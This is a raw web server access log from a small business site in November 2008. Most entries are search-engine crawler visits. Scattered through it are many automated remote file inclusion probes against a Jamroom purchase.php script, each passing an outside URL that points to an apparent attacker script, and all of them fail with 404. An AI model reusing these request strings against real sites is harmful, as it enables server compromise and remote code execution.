82.194.71.192 - - [02/Nov/2008:07:38:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
82.194.71.192 - - [02/Nov/2008:07:38:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
88.84.145.169 - - [02/Nov/2008:08:02:09 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
88.84.145.169 - - [02/Nov/2008:08:02:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
88.84.145.169 - - [02/Nov/2008:08:02:09 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:08:02:19 -0800] "GET /logs/access_080831.log HTTP/1.0" 200 244215 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:08:19:33 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:08:19:33 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:08:53:30 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
72.30.79.32 - - [02/Nov/2008:08:53:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
72.30.79.32 - - [02/Nov/2008:08:53:59 -0800] "GET /logs/?D=A HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:08:56:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:08:56:12 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:08:56:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:09:26:39 -0800] "GET /logs/access_071031.log HTTP/1.0" 200 138542 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:09:31:59 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:11 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:11 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [02/Nov/2008:09:36:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:10:09:55 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:10:12:22 -0800] "GET /?D=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
4.180.0.214 - - [02/Nov/2008:10:45:48 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; SuperSpider/139; Windows 98; Win 9x 4.90)" "autobutlerlifts.com"
4.180.0.214 - - [02/Nov/2008:10:50:46 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; SuperSpider/139; Windows 98; Win 9x 4.90)" "autobutlerlifts.com"
4.180.0.214 - - [02/Nov/2008:11:19:50 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; SuperSpider/139; Windows 98; Win 9x 4.90)" "autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:11:24:04 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:11:24:04 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:11:25:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:11:25:27 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:11:48:40 -0800] "GET /logs/access_080301.log HTTP/1.0" 200 309408 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:11:51:46 -0800] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
208.80.194.50 - - [02/Nov/2008:13:28:47 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 1.0.3705; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)" "autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:14:49:45 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:14:49:45 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [02/Nov/2008:14:49:45 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
89.159.202.119 - - [02/Nov/2008:15:08:36 -0800] "GET /logs/access.log HTTP/1.0" 200 57779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
89.159.202.119 - - [02/Nov/2008:15:19:49 -0800] "GET /logs/access.log HTTP/1.0" 206 10 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:15:33:02 -0800] "GET /logs/access_080531.log HTTP/1.0" 200 183060 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:16:02:25 -0800] "GET /logs/access_080331.log HTTP/1.0" 200 345815 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:16:47:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:16:47:38 -0800] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:18:19:32 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:18:19:32 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:19:56:19 -0800] "GET /logs/access_080731.log HTTP/1.0" 200 162423 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:20:02:02 -0800] "GET /logs/access_080501.log HTTP/1.0" 200 211007 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
72.30.65.27 - - [02/Nov/2008:20:02:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
72.30.65.27 - - [02/Nov/2008:20:02:52 -0800] "GET /logs/access_070831.log HTTP/1.0" 200 248301 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:21:01:38 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [02/Nov/2008:21:01:38 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.41 - - [02/Nov/2008:22:27:42 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; SIMBAR Enabled; SIMBAR={0302242C-2182-494c-870B-236EDFB87A4B}; SIMBAR=0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
74.6.22.112 - - [02/Nov/2008:22:36:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:23:10:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:23:10:04 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [02/Nov/2008:23:36:41 -0800] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:00:22:33 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:00:22:33 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:01:26:46 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
67.15.60.41 - - [03/Nov/2008:02:10:10 -0800] "GET /logs/access.log HTTP/1.1" 200 62168 "-" "access_log-crawler" "autobutlerlifts.com"
74.6.8.113 - - [03/Nov/2008:02:17:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.8.113 - - [03/Nov/2008:02:18:00 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
212.192.251.20 - - [03/Nov/2008:02:24:25 -0800] "GET /logs/access.log HTTP/1.1" 200 62686 "-" "access_log-crawler" "autobutlerlifts.com"
67.15.60.41 - - [03/Nov/2008:02:29:58 -0800] "GET /logs/access.log HTTP/1.1" 200 62823 "-" "access_log-crawler" "autobutlerlifts.com"
212.192.251.20 - - [03/Nov/2008:02:32:35 -0800] "GET /logs/access.log HTTP/1.1" 200 62957 "-" "access_log-crawler" "autobutlerlifts.com"
212.192.251.20 - - [03/Nov/2008:02:38:13 -0800] "GET /logs/access.log HTTP/1.1" 200 63094 "-" "access_log-crawler" "autobutlerlifts.com"
212.192.251.20 - - [03/Nov/2008:02:45:17 -0800] "GET /logs/access.log HTTP/1.1" 200 63231 "-" "access_log-crawler" "autobutlerlifts.com"
67.15.60.41 - - [03/Nov/2008:02:59:18 -0800] "GET /logs/access.log HTTP/1.1" 200 63368 "-" "access_log-crawler" "autobutlerlifts.com"
213.251.154.174 - - [03/Nov/2008:03:20:42 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.251.154.174 - - [03/Nov/2008:03:20:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.251.154.174 - - [03/Nov/2008:03:20:42 -0800] "GET /logs/access.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
213.251.154.174 - - [03/Nov/2008:03:21:18 -0800] "GET /logs/access.log%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:03:52:34 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:03:52:34 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:03:52:34 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:04:55:50 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.8.113 - - [03/Nov/2008:06:43:48 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
64.1.215.162 - - [03/Nov/2008:07:23:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:07:24:26 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:07:24:26 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
72.52.255.82 - - [03/Nov/2008:07:50:45 -0800] "GET /logs/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "autobutlerlifts.com"
72.52.255.82 - - [03/Nov/2008:07:50:46 -0800] "GET /purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "autobutlerlifts.com"
83.222.4.51 - - [03/Nov/2008:08:49:50 -0800] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
83.222.4.51 - - [03/Nov/2008:08:49:50 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
83.222.4.51 - - [03/Nov/2008:08:49:50 -0800] "GET /logs/purchase.php?jamroom[jm_dir]=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
216.158.1.198 - - [03/Nov/2008:08:52:25 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [03/Nov/2008:08:52:25 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
72.52.255.82 - - [03/Nov/2008:08:56:49 -0800] "GET /logs/access.log/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
72.52.255.82 - - [03/Nov/2008:08:56:50 -0800] "GET /purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
72.52.255.82 - - [03/Nov/2008:08:56:55 -0800] "GET /logs/purchase.php?jamroom[jm_dir]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.1.215.164 - - [03/Nov/2008:09:01:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:09:11:25 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:09:11:25 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
216.158.1.198 - - [03/Nov/2008:09:12:21 -0800] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
67.195.37.115 - - [03/Nov/2008:09:26:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
67.195.37.115 - - [03/Nov/2008:09:27:55 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:10:52:23 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:10:52:23 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:11:06:10 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [03/Nov/2008:13:21:44 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
74.6.8.103 - - [03/Nov/2008:13:46:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.8.103 - - [03/Nov/2008:13:47:14 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:14:47:04 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:14:47:04 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
89.159.202.119 - - [03/Nov/2008:15:07:41 -0800] "GET /logs/access.log HTTP/1.0" 200 70554 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
70.255.170.233 - - [03/Nov/2008:16:05:12 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
70.255.170.233 - - [03/Nov/2008:16:05:12 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:17:56:59 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [03/Nov/2008:17:56:59 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:17:56:59 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:20:59:45 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:20:59:45 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.30 - - [03/Nov/2008:23:11:15 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.10 beta 1; (R1 1.5); .NET CLR 1.1.4322)" "autobutlerlifts.com"
208.80.194.30 - - [03/Nov/2008:23:18:51 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Application CD Build 2.0.0; FunWebProducts)" "www.autobutlerlifts.com"
66.249.71.81 - - [03/Nov/2008:23:31:30 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [03/Nov/2008:23:31:30 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
88.84.142.41 - - [03/Nov/2008:23:44:33 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.autobutlerlifts.com"
88.84.142.41 - - [03/Nov/2008:23:44:33 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.autobutlerlifts.com"
88.84.142.41 - - [03/Nov/2008:23:52:06 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.autobutlerlifts.com"
88.84.142.41 - - [03/Nov/2008:23:52:06 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vobucks.com/spam/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:01:23:07 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
